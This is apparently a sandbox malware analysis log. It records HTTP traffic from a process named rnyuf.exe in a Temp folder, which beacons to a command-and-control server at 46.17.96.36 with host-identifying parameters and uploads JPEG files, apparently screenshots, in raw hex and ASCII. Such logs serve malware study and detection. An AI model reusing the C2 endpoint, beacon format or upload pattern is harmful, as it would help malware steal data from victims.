                                        Aug 29, 2021 22:28:49.439798117 CEST15859OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:49.439834118 CEST15865OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:28:49.439960003 CEST15871OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:49.472810984 CEST15884OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:49.472846031 CEST15887OUTData Raw: 56 1d 46 29 a0 8f 5a 0b 0f 5a 61 61 c6 9b 46 45 19 a5 74 00 69 28 26 90 9a 40 38 53 c5 30 1a 76 6a 93 13 40 7a d1 de 90 9a 33 9a 00 53 47 6a 05 14 08 51 4b 8a 07 34 13 8a a0 0a 5f 7a 40 68 cd 02 b0 f1 4b 4d 07 9a 75 32 42 90 d2 d0 69 80 83 a5 2e
                                        Data Ascii: VF)ZZaaFEti(&@8S0vj@z3SGjQK4_z@hKMu2Bi.(P1NP)uJdZ`(65DfNM>0R(Jh;u4pxBcRzEM"e4`GqC;S39,>L2,:4
                                        Aug 29, 2021 22:28:49.473376036 CEST15890OUTData Raw: 15 98 de 31 f0 af f0 db de d4 2d e3 2f 0d 76 86 f6 ba 15 54 fa 33 95 e1 2a 2e c6 e0 60 7b d1 91 5c f1 f1 9f 87 fb 45 79 4d 3e 33 d0 87 48 ee ff 00 4a 7c eb b0 be af 50 e9 33 4b 9a e6 7f e1 36 d1 07 fc b2 bb a5 1e 37 d1 47 fc b2 bb a3 99 0d 50 a9
                                        Data Ascii: 1-/vT3*.`{\EyM>3HJ|P3K67GP8\'Z0W_/'z?hnJW4TuDxIwC)SO5?64QhE<W>#ic]n1K'Ks}i3W3LsQ;LuVhW
                                        Aug 29, 2021 22:28:49.578342915 CEST15940INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:49 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        25192.168.2.44976046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:20.600217104 CEST3716OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:20.600354910 CEST3716OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:20.600538969 CEST3726OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:20.600644112 CEST3729OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:20.633289099 CEST3731OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:20.633327961 CEST3734OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:20.633344889 CEST3742OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:20.633507967 CEST3749OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:27:20.633616924 CEST3751OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:20.633641958 CEST3754OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:27:20.666357994 CEST3757OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:20.776627064 CEST3824INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:20 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        250192.168.2.44998946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:49.642771959 CEST15941OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:49.721581936 CEST15941INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:49 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        251192.168.2.44999046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:50.839502096 CEST15942OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:50.921204090 CEST15953INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:50 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        252192.168.2.44999146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:50.843131065 CEST15942OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:50.843199015 CEST15942OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:50.843338013 CEST15952OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:51.235548019 CEST15963OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:51.235634089 CEST15973OUTData Raw: a5 67 55 11 96 f9 08 ce 72 07 f5 a2 14 dc e4 a2 ba 8e 73 50 8b 93 d9 19 e2 8a ea bf e1 1a b3 ff 00 9e b3 ff 00 df 43 fc 28 ff 00 84 6a cf fe 7a cf ff 00 7d 0f f0 ae af a8 56 38 ff 00 b4 28 9c b5 15 d4 ff 00 c2 35 67 ff 00 3d 27 ff 00 be 87 f8 51
                                        Data Ascii: gUrsPC(jz}V8(5g='QO5'+1]W#VP{E'_cx:\1%0N5un(Na\R``sG4b,QJ)+c5d8$gR)qkm]Iz
                                        Aug 29, 2021 22:28:51.235743046 CEST15976OUTData Raw: cd b0 55 e4 e9 a9 5c f1 9d 77 c3 c6 c0 1b 9b 5c b5 be 7e 65 3c 94 ff 00 eb 56 0d 7d 06 7c 17 6d 22 32 4b 2c a5 58 60 8c 8c 11 f9 57 88 f8 93 47 6d 07 c4 37 9a 69 25 96 17 f9 18 f5 2a 46 57 f4 22 bb f2 ac ce 38 ab d2 6e f2 5f 91 f3 59 be 12 8d 29
                                        Data Ascii: U\w\~e<V}|m"2K,X`WGm7i%*FW"8n_Y)>2{GJ^O[KW$Jr@z~ax6d}Mv:_,"qjUfT*8<.:^/__E;eckyEs5g}2H
                                        Aug 29, 2021 22:28:51.272002935 CEST15979OUTData Raw: c5 14 d0 69 73 4c 91 68 06 93 bd 2f 7a 00 75 14 da 5c d5 0a c3 f3 40 34 da 29 dc 56 24 dd 8a 50 e4 77 a8 a9 73 4e e2 b1 38 94 fa d4 82 76 1d cd 55 cd 19 aa 53 64 b8 26 5d 5b a6 1d ea 45 bb 35 43 75 38 35 5a a8 c8 74 d1 a2 2e 94 f5 50 69 c2 58 58
                                        Data Ascii: isLh/zu\@4)V$PwsN8vUSd&][E5Cu85Zt.PiXX|+<585Zt{~)t8[O/t.Y-dpM:AwUS5i~z/=TdYbqMo=VBy?-#(lZi~0z:T*3
                                        Aug 29, 2021 22:28:51.272099018 CEST16017OUTData Raw: d7 68 fc 69 e3 4f 23 ef 4a a2 8b 92 e7 15 d4 a7 9f 7a 50 d5 74 59 c0 3e f4 84 fd 29 e2 1b 55 ec 5a 9d d9 1e d2 25 0c 93 4f 01 bd 0d 5e 0d 08 1f 2c 62 97 ce 1f c2 8a 28 bb 25 d4 f2 2a 08 e5 3d 10 9f c2 a4 5b 79 8f f0 e3 eb 53 99 9f b6 05 34 c8 ff
                                        Data Ascii: hiO#JzPtY>)UZ%O^,b(%*=[yS44jO;`-[iY?*q.?xvWUE._bq`4}\}}V->HV?Z9#.U9j7/>~uqnMp '/4xf(Q:=7
                                        Aug 29, 2021 22:28:51.272157907 CEST16022OUTData Raw: f4 7d 2f 8f 47 7a 28 ae b3 cc 1d de 8a 4a 5a a1 32 58 2d e5 b9 94 47 0c 65 dc f6 15 77 fb 0b 52 ff 00 9f 6f fc 7d 7f c6 ba ff 00 84 36 90 5e 78 c6 18 ae 23 59 13 76 ed ac 32 38 47 61 fa 81 5f 4b 74 18 15 e7 d5 c4 55 55 25 18 59 25 dd 5f a5 fb ae
                                        Data Ascii: }/Gz(JZ2X-GewRo}6^x#Yv28Ga_KtUU%Y%_Osz4Wke}/h:.Xxe?n-EO1~%#^_>]i)%O]ywPn^Xy-ou])8)ZCES
                                        Aug 29, 2021 22:28:51.307795048 CEST16025OUTData Raw: d6 c3 3f e1 65 f8 a7 fe 82 97 1f f8 11 2f ff 00 15 47 fc 2c bf 15 7f d0 52 e3 ff 00 02 25 ff 00 e2 a9 6d 34 0d 16 f7 49 b1 28 9a 94 77 97 da 7d dd f2 4e d7 08 d0 c2 21 79 00 57 5f 2c 1c 11 1e 37 6e 1c b0 e3 b5 67 4b a4 69 cb a1 2e b5 1c f2 b5 b5
                                        Data Ascii: ?e/G,R%m4I(w}N!yW_,7ngKi.k>jlz7qGAQ/",gBw/XZ}J${zI$[xGI]J{Y<Ex?:e ro {oLdlqNJS~uq
                                        Aug 29, 2021 22:28:51.307841063 CEST16027OUTData Raw: 6d 2d 34 02 d1 49 45 31 0b 45 1d e8 34 00 52 8e b4 82 97 8a 00 5a 29 32 28 cd 31 58 75 28 a6 6e a3 76 69 dc 2c 48 28 a6 66 8c d1 71 58 93 34 64 54 79 a2 9d c5 62 4d c3 d6 8d d4 da 28 b8 58 76 ea 32 69 28 a7 71 06 68 a2 8a 00 51 4b 49 47 7a 60 2d
                                        Data Ascii: m-4IE1E4RZ)2(1Xu(nvi,H(fqX4dTybM(Xv2i(qhQKIGz`-()94SI@+Z-(4\RA!{QLCFi4RiA1um-P&iPiLLxiA$x.jI\8S%EORdJ)KZ#1
                                        Aug 29, 2021 22:28:51.487952948 CEST16050INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:51 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        253192.168.2.44999246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:52.083343029 CEST16051OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:52.162986994 CEST16051INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:52 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        254192.168.2.44999346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:53.327419996 CEST16052OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:53.403764009 CEST16141INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:53 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        255192.168.2.44999446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:53.329668999 CEST16052OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:53.329758883 CEST16052OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:53.329924107 CEST16062OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:53.330066919 CEST16065OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:53.364907026 CEST16068OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:53.364959002 CEST16079OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:53.365103960 CEST16085OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
